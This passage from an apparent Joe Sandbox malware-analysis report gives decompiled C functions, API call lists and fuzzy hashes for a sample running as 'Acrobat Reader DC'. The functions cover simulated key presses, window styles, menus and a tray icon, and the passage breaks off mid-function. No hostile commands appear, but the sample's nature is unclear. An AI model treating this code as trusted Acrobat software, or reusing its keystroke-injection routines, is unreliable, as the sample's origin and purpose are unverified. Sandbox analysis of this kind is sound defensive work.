                                  • String ID:
                                  • API String ID: 4082120231-0
                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004443FC(intOrPtr _a4, char* _a8) {
                                  				signed int _v99;
                                  				signed int _v100;
                                  				signed int _v169;
                                  				signed int _v242;
                                  				signed int _v243;
                                  				signed int _v244;
                                  				char _v260;
                                  				void* _t53;
                                  				struct HWND__* _t54;
                                  				intOrPtr _t68;
                                  				char* _t102;
                                  				intOrPtr _t103;
                                  
                                  				_t103 = _a4;
                                  				_t102 = _a8;
                                  				if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0 ||  *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t102 + 3)) != 0 ||  *((char*)(_t102 + 4)) != 0) {
                                  					_t54 =  *(_t103 + 0x20);
                                  					if(_t54 == 0 || GetParent(_t54) == 0) {
                                  						if( *_t102 != 0) {
                                  							E0043471D(_t103, 0xa0,  *(_t103 + 0x27) & 0x000000ff, 2);
                                  						}
                                  						if( *((char*)(_t102 + 1)) != 0) {
                                  							E0043471D(_t103, 0xa1,  *(_t103 + 0x28) & 0x000000ff, 2);
                                  						}
                                  						if( *((char*)(_t102 + 2)) != 0) {
                                  							E0043471D(_t103, 0x11,  *(_t103 + 0x24) & 0x000000ff, 2);
                                  						}
                                  						if( *((char*)(_t102 + 3)) != 0) {
                                  							E0043471D(_t103, 0x12,  *(_t103 + 0x25) & 0x000000ff, 2);
                                  						}
                                  						if( *((char*)(_t102 + 4)) != 0) {
                                  							E0043471D(_t103, 0x5b,  *(_t103 + 0x29) & 0x000000ff, 2);
                                  						}
                                  						L43:
                                  						return E004347A9(_t103);
                                  					}
                                  					if(GetKeyboardState( &_v260) != 0) {
                                  						if( *_t102 != 0) {
                                  							_v244 = _v244 ^ 0x00000080;
                                  							_v100 = _v100 ^ 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 1)) != 0) {
                                  							_v244 = _v244 ^ 0x00000080;
                                  							_v99 = _v99 ^ 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 2)) != 0) {
                                  							_v243 = _v243 ^ 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 3)) != 0) {
                                  							_v242 = _v242 ^ 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 4)) != 0) {
                                  							_v169 = _v169 ^ 0x00000080;
                                  						}
                                  						SetKeyboardState( &_v260);
                                  					}
                                  					if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0) {
                                  						PostMessageW( *(_t103 + 0x20), 0x101, 0x10, ( *(_t103 + 0x26) & 0x000000ff) << 0x00000010 | 0xc0000001);
                                  					}
                                  					if( *((char*)(_t102 + 2)) != 0) {
                                  						PostMessageW( *(_t103 + 0x20), 0x101, 0x11, ( *(_t103 + 0x24) & 0x000000ff) << 0x00000010 | 0xc0000001);
                                  					}
                                  					_t68 =  *((intOrPtr*)(_t102 + 3));
                                  					if(_t68 != 0) {
                                  						if( *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t103 + 0x1c)) != 0) {
                                  							if(_t68 != 0) {
                                  								PostMessageW( *(_t103 + 0x20), 0x101, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0xc0000001);
                                  								goto L30;
                                  							}
                                  						} else {
                                  							PostMessageW( *(_t103 + 0x20), 0x105, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0xe0000001);
                                  							L30:
                                  						}
                                  					}
                                  					if( *((char*)(_t102 + 4)) == 0) {
                                  						goto L43;
                                  					}
                                  					PostMessageW( *(_t103 + 0x20), 0x101, 0x5b, ( *(_t103 + 0x29) & 0x000000ff) << 0x00000010 | 0xc0000001);
                                  					return E004347A9(_t103);
                                  				} else {
                                  					return _t53;
                                  				}
                                  			}
















                                  APIs
                                  • GetParent.USER32(?), ref: 0044443B
                                  • GetKeyboardState.USER32(?), ref: 00444450
                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004445F4(intOrPtr _a4, char* _a8) {
                                  				signed int _v99;
                                  				signed int _v100;
                                  				signed int _v169;
                                  				signed int _v242;
                                  				signed int _v243;
                                  				signed int _v244;
                                  				char _v260;
                                  				void* _t53;
                                  				struct HWND__* _t54;
                                  				intOrPtr _t68;
                                  				char* _t102;
                                  				intOrPtr _t103;
                                  
                                  				_t103 = _a4;
                                  				_t102 = _a8;
                                  				if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0 ||  *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t102 + 3)) != 0 ||  *((char*)(_t102 + 4)) != 0) {
                                  					_t54 =  *(_t103 + 0x20);
                                  					if(_t54 == 0 || GetParent(_t54) == 0) {
                                  						if( *_t102 != 0) {
                                  							E0043471D(_t103, 0xa0,  *(_t103 + 0x27) & 0x000000ff, 0);
                                  						}
                                  						if( *((char*)(_t102 + 1)) != 0) {
                                  							E0043471D(_t103, 0xa1,  *(_t103 + 0x28) & 0x000000ff, 0);
                                  						}
                                  						if( *((char*)(_t102 + 2)) != 0) {
                                  							E0043471D(_t103, 0x11,  *(_t103 + 0x24) & 0x000000ff, 0);
                                  						}
                                  						if( *((char*)(_t102 + 3)) != 0) {
                                  							E0043471D(_t103, 0x12,  *(_t103 + 0x25) & 0x000000ff, 0);
                                  						}
                                  						if( *((char*)(_t102 + 4)) != 0) {
                                  							E0043471D(_t103, 0x5b,  *(_t103 + 0x29) & 0x000000ff, 0);
                                  						}
                                  						L43:
                                  						return E0043477C(_t103);
                                  					}
                                  					if(GetKeyboardState( &_v260) != 0) {
                                  						if( *_t102 != 0) {
                                  							_v244 = _v244 | 0x00000080;
                                  							_v100 = _v100 | 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 1)) != 0) {
                                  							_v244 = _v244 | 0x00000080;
                                  							_v99 = _v99 | 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 2)) != 0) {
                                  							_v243 = _v243 | 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 3)) != 0) {
                                  							_v242 = _v242 | 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 4)) != 0) {
                                  							_v169 = _v169 | 0x00000080;
                                  						}
                                  						SetKeyboardState( &_v260);
                                  					}
                                  					if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0) {
                                  						PostMessageW( *(_t103 + 0x20), 0x100, 0x10, ( *(_t103 + 0x26) & 0x000000ff) << 0x00000010 | 0x00000001);
                                  					}
                                  					if( *((char*)(_t102 + 2)) != 0) {
                                  						PostMessageW( *(_t103 + 0x20), 0x100, 0x11, ( *(_t103 + 0x24) & 0x000000ff) << 0x00000010 | 0x00000001);
                                  					}
                                  					_t68 =  *((intOrPtr*)(_t102 + 3));
                                  					if(_t68 != 0) {
                                  						if( *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t103 + 0x1c)) != 0) {
                                  							if(_t68 != 0) {
                                  								PostMessageW( *(_t103 + 0x20), 0x100, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0x00000001);
                                  								goto L30;
                                  							}
                                  						} else {
                                  							PostMessageW( *(_t103 + 0x20), 0x104, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0x20000001);
                                  							L30:
                                  						}
                                  					}
                                  					if( *((char*)(_t102 + 4)) == 0) {
                                  						goto L43;
                                  					}
                                  					PostMessageW( *(_t103 + 0x20), 0x100, 0x5b, ( *(_t103 + 0x29) & 0x000000ff) << 0x00000010 | 0x00000001);
                                  					return E0043477C(_t103);
                                  				} else {
                                  					return _t53;
                                  				}
                                  			}
















                                  APIs
                                  • GetParent.USER32(?), ref: 00444633
                                  • GetKeyboardState.USER32(?), ref: 00444648
                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0044982A(void* __ecx, void* __eflags, signed int _a4, long _a8, long _a12) {
                                  				signed int _v8;
                                  				signed char _t40;
                                  				struct HWND__* _t42;
                                  				long _t49;
                                  				void* _t53;
                                  				struct HWND__** _t58;
                                  				intOrPtr _t63;
                                  				intOrPtr _t64;
                                  				intOrPtr _t72;
                                  				struct HWND__* _t75;
                                  				signed int _t79;
                                  				long _t80;
                                  
                                  				_t79 = _a8;
                                  				_a8 = 0;
                                  				if(E00441AF5(0x4a8630, _a4,  &_v8,  &_a4) != 0) {
                                  					_t63 =  *0x4a8690; // 0x0
                                  					_t64 =  *0x4a86a4; // 0xa71980
                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + _v8 * 4))));
                                  					_t58 =  *( *(_t64 + _a4 * 4));
                                  					_t75 =  *_t58;
                                  					if(_t79 == 0xffffffff) {
                                  						L14:
                                  						_t80 = _a12;
                                  						if(_t80 != 0xffffffff) {
                                  							_t49 = SetWindowLongW(_t75, 0xffffffec, _t80);
                                  							_t72 =  *0x4a86a4; // 0xa71980
                                  							_a8 = _t49;
                                  							if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t72 + _a4 * 4)))) + 0x88)) == 0x13) {
                                  								_a8 = SendMessageW(_t75, 0x1036, 0, _t80);
                                  							}
                                  						}
                                  						_t40 = _t58[0x22];
                                  						if(_t40 == 0xff || (_t40 & 0x000000ff) ==  *((intOrPtr*)(_v8 + 0x194))) {
                                  							E00430B87(_v8, _t58, 1);
                                  						} else {
                                  							ShowWindow(_t75, 0);
                                  						}
                                  						_t42 = _t58[0x22];
                                  						if(_t42 == 2 || _t42 == 3 || _t80 != 0xffffffff) {
                                  							SetWindowPos( *_t58, 0, 0, 0, 0, 0, 0x27);
                                  						}
                                  						return 0 | _a8 != 0x00000000;
                                  					} else {
                                  						_t53 = (_t58[0x22] & 0x000000ff) + 0xfffffffe;
                                  						if(_t53 > 0x14) {
                                  							L13:
                                  							_a8 = SetWindowLongW(_t75, 0xfffffff0, _t79 | 0x50000000);
                                  							goto L14;
                                  						} else {
                                  							switch( *((intOrPtr*)(( *(_t53 + 0x4499c6) & 0x000000ff) * 4 +  &M004499AA))) {
                                  								case 0:
                                  									__esi = __esi | 0x00000004;
                                  									goto L9;
                                  								case 1:
                                  									L9:
                                  									_push(0);
                                  									if((__esi & 0x00000800) == 0) {
                                  										__esi = __esi | 0x00010000;
                                  										SendMessageW(__edi, 0xcf, 0, ??);
                                  									} else {
                                  										SendMessageW(__edi, 0xcf, 1, ??);
                                  									}
                                  									goto L13;
                                  								case 2:
                                  									__esi = __esi | 0x0000000e;
                                  									goto L13;
                                  								case 3:
                                  									__esi = __esi | 0x00000003;
                                  									goto L13;
                                  								case 4:
                                  									__esi = __esi | 0x04000000;
                                  									goto L13;
                                  								case 5:
                                  									return 0;
                                  									goto L26;
                                  								case 6:
                                  									goto L13;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  				L26:
                                  			}
















                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00440D98(signed int _a4, intOrPtr _a8) {
                                  				intOrPtr _t29;
                                  				long _t31;
                                  				intOrPtr _t32;
                                  				signed int _t34;
                                  				intOrPtr _t36;
                                  				intOrPtr _t41;
                                  				struct HWND__*** _t44;
                                  				struct HWND__*** _t48;
                                  				signed int _t54;
                                  				intOrPtr _t62;
                                  				intOrPtr _t64;
                                  				intOrPtr _t69;
                                  				signed int _t74;
                                  				signed int _t75;
                                  				void* _t76;
                                  				signed int _t77;
                                  				void* _t86;
                                  				void* _t90;
                                  
                                  				_t29 =  *0x4a86a4; // 0xa71980
                                  				_t74 = _a4;
                                  				_t77 = _t74;
                                  				_t31 = SendMessageW( *( *( *(_t29 + _t74 * 4))), 0xf0, 0, 0);
                                  				if(_t31 != 0 || _a8 != _t31) {
                                  					if(_t74 < 3) {
                                  						L8:
                                  						_t77 = _t77 + 1;
                                  					} else {
                                  						while(1) {
                                  							_t64 =  *0x4a86a4; // 0xa71980
                                  							_t48 =  *(_t64 + _t77 * 4);
                                  							if( *_t48 == 0 || ( *_t48)[0x22] != 0x1a) {
                                  								goto L8;
                                  							}
                                  							if((GetWindowLongW( *( *( *(_t64 + _t77 * 4))), 0xfffffff0) & 0x00020000) == 0) {
                                  								_t77 = _t77 - 1;
                                  								if(_t77 >= 3) {
                                  									continue;
                                  								} else {
                                  									goto L8;
                                  								}
                                  							}
                                  							goto L9;
                                  						}
                                  						goto L8;
                                  					}
                                  					L9:
                                  					_t75 = _t74 + 1;
                                  					_t86 = _t75 -  *0x4a86b4; // 0x2
                                  					if(_t86 <= 0) {
                                  						while(1) {
                                  							_t62 =  *0x4a86a4; // 0xa71980
                                  							_t44 =  *(_t62 + _t75 * 4);
                                  							if( *_t44 == 0 || ( *_t44)[0x22] != 0x1a || (GetWindowLongW( *( *( *(_t62 + _t75 * 4))), 0xfffffff0) & 0x00020000) != 0) {
                                  								goto L15;
                                  							}
                                  							_t75 = _t75 + 1;
                                  							_t90 = _t75 -  *0x4a86b4; // 0x2
                                  							if(_t90 <= 0) {
                                  								continue;
                                  							}
                                  							goto L15;
                                  						}
                                  					}
                                  					L15:
                                  					_t76 = _t75 - 1;
                                  					_t54 = _t77;
                                  					if(_t77 <= _t76) {
                                  						do {
                                  							_t41 =  *0x4a86a4; // 0xa71980
                                  							SendMessageW( *( *( *(_t41 + _t54 * 4))), 0xf1, 0, 0);
                                  							_t54 = _t54 + 1;
                                  						} while (_t54 <= _t76);
                                  					}
                                  					if(_a8 != 1) {
                                  						_t32 =  *0x4a86a4; // 0xa71980
                                  						_t34 = GetWindowLongW( *( *( *(_t32 + _t77 * 4))), 0xfffffff0);
                                  						_t36 =  *0x4a86a4; // 0xa71980
                                  						return SetWindowLongW( *( *( *(_t36 + _t77 * 4))), 0xfffffff0, _t34 | 0x00010000);
                                  					}
                                  					_t69 =  *0x4a86a4; // 0xa71980
                                  					return SendMessageW( *( *( *(_t69 + _a4 * 4))), 0xf1, 1, 0);
                                  				} else {
                                  					return _t31;
                                  				}
                                  			}

                                  APIs
                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                  • SendMessageW.USER32(00A71980,000000F1,00000000,00000000), ref: 00440E6E
                                  • SendMessageW.USER32(00A71980,000000F1,00000001,00000000), ref: 00440E9A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow
                                  • String ID:
                                  • API String ID: 312131281-0
                                  • Opcode ID: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                  • Instruction ID: 2c169baf4234265a3f6c05f50e500cf46f5ce099e15a3d3a23704bf731ec4cbe
                                  • Opcode Fuzzy Hash: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                  • Instruction Fuzzy Hash: 944189342402119FE720CF58DDC4F2A77A1FF9A710F6049A9E2119B3A1CB74ACA2CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00448480(struct HWND__** _a4, signed int _a8, intOrPtr _a12, signed int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                  				struct tagMENUITEMINFOW _v56;
                                  				signed int _t48;
                                  				short* _t51;
                                  				struct HWND__** _t58;
                                  				intOrPtr _t60;
                                  				intOrPtr _t62;
                                  				intOrPtr _t68;
                                  				int _t75;
                                  				int _t76;
                                  				signed int _t77;
                                  
                                  				_t58 = _a4;
                                  				_t77 = _a8;
                                  				_t75 = _a16;
                                  				_v56.cbSize = 0x30;
                                  				E00412F40( &(_v56.fMask), 0, 0x2c);
                                  				if(_t75 != 0xffffffff) {
                                  					if(E00441AF5(0x4a8630, _t75,  &_a16,  &_a8) == 0) {
                                  						goto L16;
                                  					} else {
                                  						_t68 =  *0x4a8690; // 0x0
                                  						_t58 =  *( *(_t68 + _a16 * 4));
                                  						if(_t58[0x6a] == 0) {
                                  							goto L16;
                                  						} else {
                                  							_t48 = _a8;
                                  							_t60 =  *0x4a86a4; // 0xa71980
                                  							 *(_t77 + 8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t60 + _t48 * 4)))) + 8);
                                  							_t62 =  *0x4a86a4; // 0xa71980
                                  							if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t62 + _t48 * 4)))) + 0x88)) != 0xe) {
                                  								L8:
                                  								if(IsMenu( *(_t77 + 8)) == 0) {
                                  									goto L16;
                                  								} else {
                                  									goto L9;
                                  								}
                                  							} else {
                                  								_v56.fMask = 4;
                                  								if(GetMenuItemInfoW( *(_t77 + 8), _t75, 0,  &_v56) == 0) {
                                  									goto L16;
                                  								} else {
                                  									 *(_t77 + 8) = _v56.hSubMenu;
                                  									goto L8;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					if(_t58[0x6a] == 0) {
                                  						L16:
                                  						return 0;
                                  					} else {
                                  						 *(_t77 + 8) = _t58[0x68];
                                  						L9:
                                  						_v56.fMask = 0x13;
                                  						_v56.fType = 0;
                                  						if(_a28 == 1) {
                                  							_v56.fType = 0x200;
                                  						}
                                  						_t51 = _a20;
                                  						if( *_t51 == 0) {
                                  							_v56.fType = 0x800;
                                  						} else {
                                  							_v56.dwTypeData = _t51;
                                  						}
                                  						_t76 = _a24;
                                  						_v56.wID = _a12;
                                  						if(InsertMenuItemW( *(_t77 + 8), _t76, 1,  &_v56) == 0) {
                                  							goto L16;
                                  						} else {
                                  							 *(_t77 + 0x80) = _t76;
                                  							DrawMenuBar( *_t58);
                                  							return 1;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • _memset.LIBCMT ref: 004484A1
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                  • IsMenu.USER32 ref: 0044854D
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                  • DrawMenuBar.USER32 ref: 004485AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                  • String ID: 0
                                  • API String ID: 3866635326-4108050209
                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E00401B80(void* __eax, void* __fp0) {
                                  				struct _NOTIFYICONDATAW _v940;
                                  				short _v942;
                                  				short _v1196;
                                  				char _v1212;
                                  				char _v1220;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t32;
                                  				void* _t57;
                                  				intOrPtr _t59;
                                  				intOrPtr _t61;
                                  				void* _t64;
                                  				intOrPtr _t65;
                                  				void* _t78;
                                  
                                  				_t78 = __fp0;
                                  				_t23 = __eax;
                                  				_t72 =  *0x4974ea;
                                  				_push(_t57);
                                  				if( *0x4974ea != 0) {
                                  					_t64 = __eax;
                                  					_t49 =  &_v1212;
                                  					E004013C0(0x104,  &_v1212, _t72);
                                  					if( *0x4974ec == 1) {
                                  						_t49 =  *0x497520;
                                  						LoadStringW( *0x497520, 0x65,  &_v1196, 0x7f);
                                  					} else {
                                  						_v1196 = 0;
                                  					}
                                  					E00402160( &_v1212,  &_v1196, 0, _t57);
                                  					if( *0x4974e9 != 0) {
                                  						_t59 =  *0x4a7f50; // 0x8dface
                                  						E0040D200( &_v1212, _t49, _t59, _t78);
                                  						_t65 =  *0x4a826c; // 0x9
                                  						_t32 = E004348DE(_t65);
                                  						__eflags = _t32;
                                  						if(_t32 == 0) {
                                  							goto L7;
                                  						} else {
                                  							E0040D200( &_v1212, _t49, L"\nLine: ", _t78);
                                  							_t61 = E004348DE(_t65);
                                  							goto L6;
                                  						}
                                  						L13:
                                  					} else {
                                  						if( *((intOrPtr*)(_t64 + 0x60)) != 0) {
                                  							E0040E0A0( &_v1212, _t64 + 0x5c);
                                  						} else {
                                  							_t61 =  *0x4a7f50; // 0x8dface
                                  							L6:
                                  							E0040D200( &_v1212, _t49, _t61, _t78);
                                  						}
                                  					}
                                  					L7:
                                  					E00412F40( &(_v940.hWnd), 0, 0x3a4);
                                  					_v940.cbSize = 0x3a8;
                                  					_v940.hWnd =  *0x497518;
                                  					_v940.uID = 1;
                                  					_v940.uFlags = 4;
                                  					E00412FBA( &_v1196, _v1212, 0x7f);
                                  					_v942 = 0;
                                  					E00411567( &(_v940.szTip),  &_v1196);
                                  					Shell_NotifyIconW(1,  &_v940);
                                  					_t23 = E00402250( &_v1220);
                                  				}
                                  				return _t23;
                                  				goto L13;
                                  			}

                                  APIs
                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _memset.LIBCMT ref: 00401C02
                                  • _wcsncpy.LIBCMT ref: 00401C41
                                  • _wcscpy.LIBCMT ref: 00401C5D
                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy_wcslen_wcsncpy
                                  • String ID: Line:
                                  • API String ID: 1756504749-1585850449
                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040F850(void* __eax, void* __ecx, void* __eflags) {
                                  				char _v8;
                                  				char _v16;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t11;
                                  				void* _t15;
                                  				void* _t18;
                                  				void* _t31;
                                  				void* _t32;
                                  				void* _t34;
                                  				unsigned int* _t35;
                                  				void* _t49;
                                  				void* _t50;
                                  				void* _t52;
                                  				void* _t53;
                                  				void* _t55;
                                  				void* _t56;
                                  				void* _t57;
                                  				void* _t59;
                                  				void* _t64;
                                  				void* _t65;
                                  				void* _t66;
                                  				void* _t67;
                                  
                                  				_t38 = __ecx;
                                  				_t50 = __eax;
                                  				_t56 = __ecx;
                                  				_t11 = E00413530(__eax);
                                  				_t65 = _t64 + 4;
                                  				E0040F820(_t56);
                                  				E0040F880(_t11, _t38, _t56, _t50);
                                  				_t52 = _t49;
                                  				_t15 = _t56;
                                  				_t57 = _t55;
                                  				_t34 = _t32;
                                  				_t66 = _t65 - 0xc;
                                  				_push(_t34);
